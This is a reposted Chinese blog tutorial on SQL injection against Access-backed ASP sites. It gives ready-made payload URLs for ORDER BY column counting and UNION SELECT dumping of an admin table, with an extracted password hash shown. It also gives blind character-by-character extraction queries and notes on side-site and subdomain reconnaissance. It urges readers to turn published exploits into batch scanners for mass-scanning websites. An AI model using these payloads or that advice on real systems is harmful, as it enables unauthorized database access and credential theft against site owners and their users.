Sql注入基础_access注入

本文详细介绍Access数据库中的SQL注入攻击手段,包括联合查询法、逐字猜解法及偏移注入等技术细节。通过实例演示如何利用这些方法进行表名、列名及数据的猜解。

1.access注入攻击片段-联合查询

2.access注入攻击片段-逐字猜解法

3.Access偏移注入(表名和列名猜解成功率不是百分百,猜解不到

 

access注入攻击片段-联合查询法

 

判断注入

猜解表名

猜解列名

猜解数据

Order by 22 22 代表查询的列名的数目有22

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 错误



猜解表名 确定存在admin表名

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

爆出3,5

 

 

名称:3
介绍:15

 


猜解列名 猜解数据(在3和15位置上填入可能存在的列名)

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,password,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22 from admin

 

爆出帐号密码

 

 

名称:a48e190fafc257d3
介绍:admin

 

 

2.access注入攻击片段-逐字猜解法

查表:and exists (select * from 表名)

查列:and exists (select 列名from 表名)

查数据:1.确定长度 2.确定asc数据(asc编码)

and (select top 1 len(列名) from admin)=5

and (select top 1 asc(mid(列名,位数,1)) from admin)=97

and (select top 1 asc(mid(列名,位数,1)) from admin)=97



Admin

Adminpassword

Admin列名长度为5

Password 列名长度为16

 

3.access偏移注入是解决一些注入出不来列名或者时的情况,同时要求支持union select ,列名也必须足够多,知道表名

 https://www.cnblogs.com/habi/articles/7837565.html

 

 

旁注查询,子域名查询


旁注查询:同服务器下不同的站点,寻找查询接口

http://dns.aizhan.com/www.whxy.net/


子域名查询:

分为二级或三级域名,可能存在同服务器或同网段

搜索引擎查询,暴力猜解(layersubDomainsBrute等)

 

www.0day5.com,可以上这个网站看看最新的oday ,改写里面的exp改成批量扫描的,批量扫站

 

 

 

 

 

转载于:https://www.cnblogs.com/cui0x01/p/8620411.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值